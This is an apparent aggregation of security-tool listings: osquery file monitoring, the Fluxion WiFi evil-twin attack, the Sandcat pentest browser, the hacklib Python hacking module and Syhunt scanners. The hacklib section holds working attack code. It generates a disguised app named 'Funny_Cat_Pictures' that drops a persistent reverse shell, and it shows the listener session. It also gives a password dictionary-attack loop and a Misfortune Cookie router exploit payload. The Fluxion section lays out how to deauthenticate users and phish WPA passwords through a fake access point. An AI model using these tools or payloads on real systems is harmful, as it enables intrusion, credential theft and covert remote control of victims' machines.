osquery provides several FIM features too! Just as OS concepts are represented in tabular form, the daemon can track OS events and later expose them in a table. Tables like file_events or yara_events can be selected to retrieve buffered events.
The configuration allows you to organize files and directories for monitoring. Those sets can be paired with lists of YARA signatures or configured for additional monitoring such as access events.

Process and socket auditing
There are several forms of eventing in osquery along with file modifications and accesses. These range from disk mounts, network reconfigurations, hardware attach and detaching, and process starting. For a complete set review the table documentation and look for names with the _events suffix.

Vulnerabilities
Facebook has a bug bounty program that includes osquery. If you find a security vulnerability in osquery, please submit it via the process outlined on that page and do not file a public issue. For more information on finding vulnerabilities in osquery, see a recent blog post about bug-hunting osquery .

Learn more
Read the launch blog post for background on the project. If you're interested in learning more about osquery, visit the users guide and browse our RFC-labeled Github issues. Development and usage discussion is happing in the osquery Slack, grab an invite automatically: https://osquery-slack.herokuapp.com/ !

Download osquery

Fluxion is a remake of linset by vk496 with less bugs and more features. It's compatible with the latest release of Kali (Rolling). Latest builds (stable) and (beta) HERE . If you new, please start reading the wiki

Fluxion GUI

How it works

Scan the networks.
Capture a handshake (can't be used without a valid handshake, it's necessary to verify the password)
Use WEB Interface *
Launch a FakeAP instance to imitate the original access point
Spawns a MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the FakeAP and enter the WPA password.
A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script
A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password
Each submitted password is verified by the handshake captured earlier
The attack will automatically terminate, as soon as a correct password is submitted

Requirements
A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling. Kali 2 & 2016 support the latest aircrack-ng versions. A external wifi card is recommended.

Credits

Deltax @FLuX and Fluxion main developer
Strasharo @Fluxion help to fix DHCPD and pyrit problems, spelling mistakes
vk496 @Linset main developer of linset
ApatheticEuphoria @WPS-SLAUGHTER,Bruteforce Script,Help with Fluxion
Derv82 @Wifite/2
Princeofguilty @webpages
Photos for wiki @ http://www.kalitutorials.net

Useful links

Download Fluxion

Sandcat is a lightweight multi-tabbed web browser that combines the speed and power of Chromium and Lua. Sandcat comes with built-in live headers, an extensible user interface and command line console, resource viewer, and many other features that are useful for web developers and pen-testers and when you need to examine live web applications. For more details, visit http://www.syhunt.com/sandcat/ . See also the docs directory and credits section below for a few more details about the Sandcat architecture.

Directories

/docs - Lua API documentation
/packs - contents of uncompressed pack files
- /Common - common CSS, widgets and scripts package (Common.pak)
- /Resources - resources package (Resources.pak)
/src - the main executable source and built-in resource files
- /core - user interface source
- /html - user interface resources (HTML)
- /lua - Lua API source

Download
Compiled binaries for Windows can be downloaded from the links below.

5.3 64-bit
5.3 32-bit
5.3 32-bit with Pen-Tester Tools (included as part of Syhunt Community)

Compiling
For compiling Sandcat, you will just need Catarinka and pLua .
The entire Sandcat user interface is created during runtime, so there is no need to install third-party components in the IDE - you can just add the dependencies listed above to the library path and hit compile. It compiles under Delphi 10 Seattle down to XE2. If you are trying to compile it with Lazarus, let me know which errors you get - I will try to do the same soon.
Some work is still needed before a Mac or Linux version materializes.

ChangeLog

5.3

This upgrade brings more stability on newer OSes.

Fixed: constant freeze during navigation under some Windows installations (IPC related).
Fixed: AV when restoring minimized Sciter dialog.
Replaced the Selenite library with Catarinka.

5.2

Added the ability to create offscreen Chromium renderers using the Lua API.
Improved tab status bar text handling.
Improved task script error handling.
Improved live headers.
Improved startup for Windows 10 compatibility.
Make window close work as cancel in Preferences dialog.
The Chromium library was upgraded to the latest release.
Some extensive code cleanup.
Minor user experience improvements.
64-bit version now available separately (special thanks for @RJ35 for fixing a Chromium

related crash under Win64 environments making this release possible)

Fixed: a rare crash when switching tabs.

5.1

This release address minor issues like a crash when loading a homepage during startup or calling the context-menu from a loaded web page.

5.1 Beta 3

This release uses the latest Chromium binaries. This fixes some instability issues when browsing with the live headers enabled.

5.1 Beta 2

This release is focused on stability and performance, as well as some other improvements such as being able to ignore certificate errors while navigating and open PDF files.

Here is what changed in version 5.1:

Switched to the WACEF Chromium framework and the latest Chromium binaries. This significantly improves speed and stability, and fixes some issues during shutdown.
Most preferences now get applied instantly (just need to open a new tab instead of restarting).
Added a certificate error dialog.
Added a PDF viewer plugin.
Added proxy support.
Improved Lua integration.
Minor compiler optimizations.
The OpenSSL library was upgraded to the latest release.
The Selenite library was upgraded to the latest release.

5.0

We're excited to announce a brand new version of our Sandcat Browser (codenamed Catarinka browser), now available as a free, open source project - because many people asked for it, the entire source for Sandcat is now available on GitHub. Feel free to fork it, examine it, contribute code, send suggestions, report or fix issues.

Here is what changed in version 5.0 beta 1:

Faster startup and responsiveness.
Huge refactoring and cleanup of the current code.
The Chromium library was upgraded to the latest release (incredibly fast!).
Improved compatibility with 64-bit Windows editions.
Improved source code editor.
Available as free, open source/community edition (under a BSD-3-Clause license).
Built using components and libraries from the Catarinka toolkit (also made open source at the same time with this release and under the same license).
Includes the Selenite Lua library - a multi-purpose set of Lua extensions developed to make the development of Lua extensions easier in Sandcat. The code for Selenite is now open source, under the MIT license. The library documentation is available here.
Fixed: output of the SHA1 and the full URL encoders that come with the pen-tester pack.

Download Sandcat Browser

Toolkit for hacking enthusiasts using Python.
hacklib is a Python module for hacking enthusiasts interested in network security. It is currently in active development.

Installation
To get hacklib, simply run in command line:

pip install hacklib

hacklib also has a user interface. To use it, you can do one of the following:
Download hacklib.py and run in console:

python hacklib.py
----------------------------------------------
Hey. What can I do you for?


Enter the number corresponding to your choice.

1) Connect to a proxy
2) Target an IP or URL
3) Lan Scan
4) Create Backdoor
5) Server
6) Exit

Or if you got it using pip:

import hacklib
hacklib.userInterface()

Dependencies
Not all classes have external dependencies, but just in case you can do the following:

hacklib.installDependencies()

Usage Examples
Reverse shell backdooring (Currently only for Macs):

import hacklib

bd = hacklib.Backdoor()
# Generates an app that, when ran, drops a persistent reverse shell into the system.
bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures')
# Takes the IP and port of the command server, the OS of the target, and the name of the .app

Generated App:
Listen for connections with Server:

>>> import hacklib
>>> s = hacklib.Server(9090) # Bind server to port 9090
>>> s.listen() 
New connection ('127.0.0.1', 50011) # Target ran the app (connection retried every 60 seconds)
bash: no job control in this shell
bash$ whoami # Type a command
leon
bash$ # Nice!

Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins:

import hacklib

ac = hacklib.AuthClient()
# Logging into a gmail account
htmldata = ac.login('https://gmail.com', 'email', 'password')

# Check for a string in the resulting page
if 'Inbox' in htmldata: print 'Login Success.'
else: print 'Login Failed.'

# For logins using HTTP Basic Auth:
try: 
    htmldata = ac.login('http://somewebsite.com', 'admin', 'password')
except: pass #login failed

Simple dictionary attack using AuthClient:

import hacklib

ac = hacklib.AuthClient()
# Get the top 100 most common passwords
passwords = hacklib.topPasswords(100)

for p in passwords:
    htmldata = ac.login('http://yourwebsite.com/login', 'admin', p)
    if htmldata and 'welcome' in htmldata.lower():
        print 'Password is', p
        break

Port Scanning:

from hacklib import *

ps = PortScanner()
ps.scan(getIP('yourwebsite.com'))
# By default scans the first 1024 ports. Use ps.scan(IP, port_range=(n1, n2), timeout=i) to change default

# After a scan, open ports are saved within ps for reference
if ps.portOpen(80):
    # Establish a TCP stream and sends a message
    send(getIP('yourwebsite.com'), 80, message='GET HTTP/1.1 \r\n')

Misfortune Cookie Exploit (CVE-2014-9222) using PortScanner:

>>> import hacklib

# Discovery
>>> ps = hacklib.PortScanner()
>>> ps.scan('192.168.1.1', (80, 81))
Port 80:
HTTP/1.1 200
Content-Type: text/html
Transfer-Encoding: chunked
Server: RomPager/4.07 UPnP/1.0
EXT:
# The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable.

# Exploitation
>>> payload = '''GET /HTTP/1.1
Host: 192.168.1.1
User-Agent: googlebot
Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB\x00''' + '\r\n\r\n'
>>> hacklib.send('192.168.1.1', 80, payload)
# The cookie replaced the firmware's memory allocation for web authentication with a null bye.
# The router's admin page is now fully accessible from any web browser.

FTP authentication:

import hacklib
ftp = hacklib.FTPAuth('127.0.0.1', 21)
try:
    ftp.login('username', 'password')
except:
    print 'Login failed.'

Socks4/5 proxy scraping and tunneling

>>> import hacklib
>>> import urllib2
>>> proxylist = hacklib.getProxies() # scrape recently added socks proxies from the internet
>>> proxy = hacklib.Proxy()
>>> proxy.connect(proxylist) # automatically find and connect to a working proxy in proxylist
>>> proxy.IP
u'41.203.214.58'
>>> proxy.port
65000
>>> proxy.country
u'KE'
# All Python network activity across all modules are routed through the proxy:
>>> urllib2.urlopen('http://icanhazip.com/').read() 
'41.203.214.58\n'
# Notes: Only network activity via Python are masked by the proxy.
# Network activity on other programs such as your webbrowser remain unmasked.
# To filter proxies by country and type:
# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5')

Word Mangling:

from hacklib import *

word = Mangle("Test", 0, 10, 1990, 2016)

word.Leet()
word.Numbers()
word.Years()

Output:

T3$t
Test0
0Test
...snip...
Test10
10Test
Test1990
1990Test
...snip...
Test2016
2016Test

Pattern Create:

from hacklib import *

Pattern = PatternCreate(100)

Pattern.generate()

Output:

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Pattern Offset:

from hacklib import *

Offset = PatternOffset("6Ab7")

Offset.find()

Output:

[+] Offset: 50

Download python-hacklib

Syhunt released the new generation of its console-based scan tools, simply called ScanTools. The first release of ScanTools comes with four console applications: - ScanURL,ScanCode, ScanLog and ScanConf, incorporating the functionality of the scanners Syhunt Hybrid/Dynamic, Syhunt Code, Syhunt Insight and Syhunt Harden respectively. Whether you want to scan a live web application, source code files, web server logs or configuration files for vulnerabilities, weaknesses and more, ScanTools can help you start the task with a single line command. Syhunt ScanTools is available for download as a freeware portable package or as part of Syhunt Community.

Installation

Download Information

Syhunt ScanTools is included with the latest release of Syhunt. It is located in the installation directory of the suite.

Please note that the full-featured version of the tools is only available for registered users.

System Requirements

512 MB of memory
200 MB of free disk space
Internet connection (optional for remote scanning)
Windows XP, 2003, 2008, Vista, 7, 8 or 10.

Usage

Just run any of the Scan*.exe apps, which are located in the installation directory of Syhunt Hybrid, with no parameters to see usage instructions.

Supported Hunt Methods

For detailed information about scan methods, see the Hunt Methods page.

Scanning IPv6 addresses

Scanurl fully supports the scanning of IPv6 addresses. To scan an IPv6 target, enclose the address in square brackets, eg:

Scanurl http://[2001:4860:0:2001::68]

Black Box (Dynamic Scan)

Go to the directory Syhunt Hybrid is installed using the command prompt.
Use the following command-line:

 Scanurl [starturl] -hm:[a huntmethod]] -gr

 Example:
 Scanurl http://www.somehost.com -hm:appscan -gr

White Box (Source Code Scan)

Go to the directory Syhunt is installed using the command prompt.
Example command-line:

 Scancode C:\WWW\Docs\ -gr

Gray Box (Dynamic + Code Scan)

Go to the directory Syhunt Hybrid is installed using the command prompt.
Use the following command-line:

 Scanurl [starturl] -hm:[a huntmethod]] -srcdir:"[SourceDir]" -gr

 Example:
 Scanurl localhost -hm:appscan -srcdir:"C:\WWW\Docs\" -gr

Note: if you already entered the source code directory for the target host using the Syhunt Hybrid GUI in a past scan it is not necessary to assign it again using the -srcdir command.

Download Syhunt ScanTools